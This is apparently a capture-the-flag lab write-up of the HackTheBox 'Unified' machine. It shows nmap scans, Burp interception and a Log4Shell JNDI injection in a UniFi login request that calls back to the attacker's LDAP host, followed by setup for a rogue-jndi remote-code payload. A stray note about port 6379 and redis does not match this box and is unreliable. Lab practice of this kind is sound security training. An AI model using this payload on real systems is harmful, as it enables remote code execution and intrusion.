04.UNIFIED

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -sC -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
 |   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
 |_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
 6789/tcp open  ibm-db2-admin?
 8080/tcp open  http-proxy
 |_http-open-proxy: Proxy might be redirecting requests
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.1 404 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 431
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 404 
 |     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 
 |     Found</h1></body></html>
 |   GetRequest, HTTPOptions: 
 |     HTTP/1.1 302 
 |     Location: http://localhost:8080/manage
 |     Content-Length: 0
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |   RTSPRequest, Socks5: 
 |     HTTP/1.1 400 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 435
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 400 
 |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
 |_    Request</h1></body></html>
 |_http-title: Did not follow redirect to https://10.129.96.149:8443/manage
 8443/tcp open  ssl/nagios-nsca Nagios NSCA
 | ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
 | Subject Alternative Name: DNS:UniFi
 | Not valid before: 2021-12-30T21:37:24
 |_Not valid after:  2024-04-03T21:37:24
 | http-title: UniFi Network
 |_Requested resource was /manage/account/login?redirect=%2Fmanage
 8843/tcp open  ssl/unknown
 | ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
 | Subject Alternative Name: DNS:UniFi
 | Not valid before: 2021-12-30T21:37:24
 |_Not valid after:  2024-04-03T21:37:24
 | fingerprint-strings: 
 |   GetRequest, HTTPOptions, RTSPRequest: 
 |     HTTP/1.1 400 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 435
 |     Date: Mon, 21 Apr 2025 04:17:55 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 400 
 |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
 |_    Request</h1></body></html>
 8880/tcp open  cddbp-alt?
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.1 404 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 431
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 404 
 |     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 
 |     Found</h1></body></html>
 |   GetRequest: 
 |     HTTP/1.1 400 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 435
 |     Date: Mon, 21 Apr 2025 04:17:37 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 400 
 |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
 |     Request</h1></body></html>
 |   HTTPOptions: 
 |     HTTP/1.1 400 
 |     Content-Type: text/html;charset=utf-8
 |     Content-Language: en
 |     Content-Length: 435
 |     Date: Mon, 21 Apr 2025 04:17:43 GMT
 |     Connection: close
 |     <!doctype html><html lang="en"><head><title>HTTP Status 400 
 |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
 |_    Request</h1></body></html>
 3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port8080-TCP:V=7.94SVN%I=7%D=4/20%Time=6805C6E2%P=x86_64-pc-linux-gnu%r
 SF:(GetRequest,84,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8
 SF:080/manage\r\nContent-Length:\x200\r\nDate:\x20Mon,\x2021\x20Apr\x20202
 SF:5\x2004:17:37\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,84
 SF:,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/manage\r\n
 SF:Content-Length:\x200\r\nDate:\x20Mon,\x2021\x20Apr\x202025\x2004:17:37\
 SF:x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x
 SF:20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Langua
 SF:ge:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Mon,\x2021\x20Apr\x2020
 SF:25\x2004:17:37\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>
 SF:<html\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93
 SF:\x20Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-fam
 SF:ily:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white
 SF:;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-s
 SF:ize:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x2
 SF:0{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;borde
 SF:r:none;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\
 SF:x20Bad\x20Request</h1></body></html>")%r(FourOhFourRequest,24A,"HTTP/1\
 SF:.1\x20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-La
 SF:nguage:\x20en\r\nContent-Length:\x20431\r\nDate:\x20Mon,\x2021\x20Apr\x
 SF:202025\x2004:17:37\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20h
 SF:tml><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x20\xe2\x80
 SF:\x93\x20Not\x20Found</title><style\x20type=\"text/css\">body\x20{font-f
 SF:amily:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:whi
 SF:te;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font
 SF:-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\
 SF:x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;bor
 SF:der:none;}</style></head><body><h1>HTTP\x20Status\x20404\x20\xe2\x80\x9
 SF:3\x20Not\x20Found</h1></body></html>")%r(Socks5,24E,"HTTP/1\.1\x20400\x
 SF:20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20
 SF:en\r\nContent-Length:\x20435\r\nDate:\x20Mon,\x2021\x20Apr\x202025\x200
 SF:4:17:37\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x
 SF:20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad
 SF:\x20Request</title><style\x20type=\"text/css\">body\x20{font-family:Tah
 SF:oma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;backgr
 SF:ound-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16p
 SF:x;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color
 SF::black;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;
 SF:}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\
 SF:x20Request</h1></body></html>");
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port8843-TCP:V=7.94SVN%T=SSL%I=7%D=4/20%Time=6805C6F3%P=x86_64-pc-linux
 SF:-gnu%r(GetRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/ht
 SF:ml;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r
 SF:\nDate:\x20Mon,\x2021\x20Apr\x202025\x2004:17:55\x20GMT\r\nConnection:\
 SF:x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTT
 SF:P\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20t
 SF:ype=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\
 SF:x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20
 SF:{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}
 SF:\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:
 SF:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP
 SF:\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>"
 SF:)%r(HTTPOptions,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html
 SF:;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\n
 SF:Date:\x20Mon,\x2021\x20Apr\x202025\x2004:17:55\x20GMT\r\nConnection:\x2
 SF:0close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\
 SF:x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20typ
 SF:e=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x2
 SF:0h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{f
 SF:ont-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x
 SF:20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1p
 SF:x;background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x
 SF:20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%
 SF:r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;c
 SF:harset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDa
 SF:te:\x20Mon,\x2021\x20Apr\x202025\x2004:17:55\x20GMT\r\nConnection:\x20c
 SF:lose\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x2
 SF:0Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=
 SF:\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h
 SF:2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{fon
 SF:t-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20
 SF:p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;
 SF:background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20
 SF:Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>");
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port8880-TCP:V=7.94SVN%I=7%D=4/20%Time=6805C6E3%P=x86_64-pc-linux-gnu%r
 SF:(GetRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;cha
 SF:rset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate
 SF::\x20Mon,\x2021\x20Apr\x202025\x2004:17:37\x20GMT\r\nConnection:\x20clo
 SF:se\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20S
 SF:tatus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"
 SF:text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,
 SF:\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-
 SF:size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\
 SF:x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;ba
 SF:ckground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20St
 SF:atus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>")%r(Fo
 SF:urOhFourRequest,24A,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20text/html
 SF:;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20431\r\n
 SF:Date:\x20Mon,\x2021\x20Apr\x202025\x2004:17:37\x20GMT\r\nConnection:\x2
 SF:0close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\
 SF:x20Status\x20404\x20\xe2\x80\x93\x20Not\x20Found</title><style\x20type=
 SF:\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h
 SF:2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{fon
 SF:t-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20
 SF:p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;
 SF:background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20
 SF:Status\x20404\x20\xe2\x80\x93\x20Not\x20Found</h1></body></html>")%r(HT
 SF:TPOptions,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;chars
 SF:et=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\
 SF:x20Mon,\x2021\x20Apr\x202025\x2004:17:43\x20GMT\r\nConnection:\x20close
 SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
 SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
 SF:xt/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x
 SF:20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-si
 SF:ze:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x2
 SF:0{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;back
 SF:ground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Stat
 SF:us\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>");
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
 * the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -Pn option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,6789,8080,8443,8843,8880
 PORT   STATE SERVICE
 22/tcp   open     ssh
 6789/tcp filtered ibm-db2-admin
 8080/tcp open     http-proxy
 8443/tcp open     https-alt
 | http-enum: 
 |_  /api/: Potentially interesting folder (401 )
 8843/tcp open     unknown
 8880/tcp open     cddbp-alt

Nmap done: 1 IP address (1 host up) scanned in 112.77 seconds

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found the service may be patched, but an empty result only
         means no scripted check matched; it is not proof that the service is safe

FOOTHOLD

Submit user flag and root flag.

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username: test
 password: test
 ...
 * submit the expected user input

BURP > Proxy > Intercept > Raw
 ...
 
 * Send to repeater
 
BURP > Repeater
 Request
  ...
  POST /api/login HTTP/1.1
  Host: 10.129.96.149:8443
  Cookie: unifises=ROLvFpn...; csrf_token=29RxNe...
  X-Csrf-Token: 29RxNe...
  
  {
    "username":"test",
    "password":"test",
    "remember":"${jndi:ldap://10.10.14.25/whatever}",    <-- this is the vulnerable parameter
    "strict":true
  }

 * if the request causes the server to connect back to us, 
   then we have verified that the application is vulnerable.
    - ${jndi:ldap://{Tun0 IP Address}/whatever}
       - JNDI (Java Naming and Directory Interface) is an API that allows 
         Java applications to locate and access resources, such as database 
         servers or messaging systems, by making naming and directory 
         service calls.
       - LDAP (Lightweight Directory Access Protocol) is an open, 
         vendor-neutral protocol used to access and manage distributed 
         directory information over a network. It typically runs on port 389.

 Response
  ...
  HTTP/1.1 400 OK
   ...
   
   {
     "meta":{
       "rc":"error",
       "msg":"api.err.InvalidPayload"
     },
     "data":[
     ]
   }
  
 * the error message states that the payload is invalid, but the JNDI lookup
   was still evaluated and the server attempted to connect to the remote host/server
   
#monitor the network traffic for LDAP connections.
root@htb:~$ sudo tcpdump -i tun0 port 389

BURP > Repeater > Send
 ...
 tcpdump
 
 * tcpdump will show the LDAP connection attempts from the target arriving at the attacking machine
 
#install OpenJDK & Maven to build a payload that can be sent to the server and will provide RCE on the vulnerable system
root@htb:~$ sudo apt update
root@htb:~$ sudo apt install openjdk-11-jdk -y
root@htb:~$ sudo apt install maven

* OpenJDK is the Java Development Kit used to build Java applications, while Maven is a build tool that helps structure projects and compile them into JAR files. Together, they can be used to run the rogue-jndi Java application, which starts a local LDAP server to receive callbacks from vulnerable servers and execute malicious code.
